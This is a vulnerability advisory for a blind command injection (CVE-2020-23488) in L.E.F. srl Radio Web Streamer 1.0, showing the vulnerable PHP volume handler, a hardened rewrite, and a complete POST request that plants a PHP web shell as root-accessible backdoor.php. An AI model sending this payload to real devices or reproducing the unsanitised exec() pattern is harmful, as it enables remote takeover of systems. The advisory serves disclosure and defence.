L.E.F. srl – Radio Web Streamer – v1.0 – Blind Command Injection

Title: L.E.F. srl – Radio Web Streamer – v1.0 – Blind Command Injection
Discovery date: 29/05/2020
Release date: 25/02/2021
Credits: Francesco Marano
Affected products: Radio Web Streamer, version 1.0
Class: Parameter Injection, Command Injection, Remote Command Execution

Disclosure timeline

29/05/2020: Request for CVE ID
27/06/2020: Additional info sent to MITRE
25/02/2021: CVE-2020-23488 released

Vulnerability details

A blind command injection in L.E.F. srl Radio Web Streamer 1.0 allows an authenticated attacker to execute arbitrary commands on the target system via a specially crafted HTTP POST request. No command output is returned to the attacker.

The /api/volumeAudioHandler/setVolume.php endpoint sets the audio volume using the following excerpt of PHP code:

$data = json_decode(file_get_contents("php://input"), 1);
$vol = $data['data'];                                        // user-controlled, never validated
$command = "sudo -u root /usr/bin/amixer set PCM " . $vol . "%";

exec($command, $output, $retval);                            // $vol is interpolated into a shell command as root
$response["res"] = false;
$response["msg"] = "Operazione fallita. Riprovare";
if ($retval == 0) {
    $response["res"] = true;
    $response["msg"] = "Operazione avvenuta con successo";
}
echo json_encode($response);                                 // only the success/failure flag reaches the client

As you can see, the $vol value comes unsanitized from user input and is concatenated into the string passed to exec(). Based on the command's return code, the response message is "Operazione avvenuta con successo" if it is zero and "Operazione fallita. Riprovare" otherwise.

Since the user input is not escaped, an attacker can append OS commands by using a payload such as 100%; <command> #. This results in the execution of the following command line:

sudo -u root /usr/bin/amixer set PCM 100%; <command> #%

The audio volume is correctly set to 100%, then <command> is executed, and the trailing "%" is simply commented out by the "#".
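For comparison, the following is a hardened rewrite of the handler above. It is an added example, not the vendor's code: it rejects anything that is not an integer volume between 0 and 100 before the value reaches exec(), and additionally passes the argument through escapeshellarg() so that shell metacharacters can never be interpreted. The JSON body shape ({"data": ...}) and the amixer invocation are taken from the advisory; the function names are assumed for this example.

```php
<?php
// Added example (not the vendor's code): hardened setVolume handler.

// Returns the volume as an int in 0..100, or null if the input is not acceptable.
function parseVolume(string $rawBody): ?int
{
    $data = json_decode($rawBody, true);
    if (!is_array($data) || !array_key_exists('data', $data)) {
        return null;
    }
    $vol = $data['data'];
    // Allow-list: a JSON integer or a string of 1-3 digits, nothing else.
    // The injection payload "100%; <command> #" fails here and is never executed.
    if (is_int($vol)) {
        $n = $vol;
    } elseif (is_string($vol) && preg_match('/^\d{1,3}\z/', $vol) === 1) {
        $n = (int) $vol;
    } else {
        return null;
    }
    return ($n >= 0 && $n <= 100) ? $n : null;
}

// Builds the amixer command line with the argument single-quoted by escapeshellarg().
function buildVolumeCommand(int $vol): string
{
    return 'sudo -u root /usr/bin/amixer set PCM ' . escapeshellarg($vol . '%');
}

$response = ['res' => false, 'msg' => 'Operazione fallita. Riprovare'];
$vol = parseVolume((string) file_get_contents('php://input'));

if ($vol !== null) {
    exec(buildVolumeCommand($vol), $output, $retval);
    if ($retval === 0) {
        $response = ['res' => true, 'msg' => 'Operazione avvenuta con successo'];
    }
}

header('Content-Type: application/json');
echo json_encode($response);
```

A request body of {"data":"100%; id #"} now yields the failure response without any command being run, while {"data":"75"} and {"data":75} both produce amixer set PCM '75%'.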

Since the attacker only sees the return code and not the command output, this vulnerability can be used to blindly write a web shell to the target machine, which then allows running commands and reading their output.

A malicious HTTP POST request to create a web shell is:

POST /api/volumeAudioHandler/setVolume.php HTTP/1.1
Host: <target>
Referer: http://<target>/(homeRouter:streamConfigurator)
Content-Type: application/json; charset=utf-8
Authorization: Bearer *REDACTED*
Content-Length: 74

{"data":"100%; echo '<?php system($_GET[\"c\"]); ?>' > /var/www/html/backdoor.php #"}

If the response contains the "Operazione avvenuta con successo" string, the attacker can run arbitrary commands on the target machine, with output, by simply sending HTTP GET requests from a browser to the following link:

http://<target>/backdoor.php?c=<command>

where <command> can be any non-interactive OS command.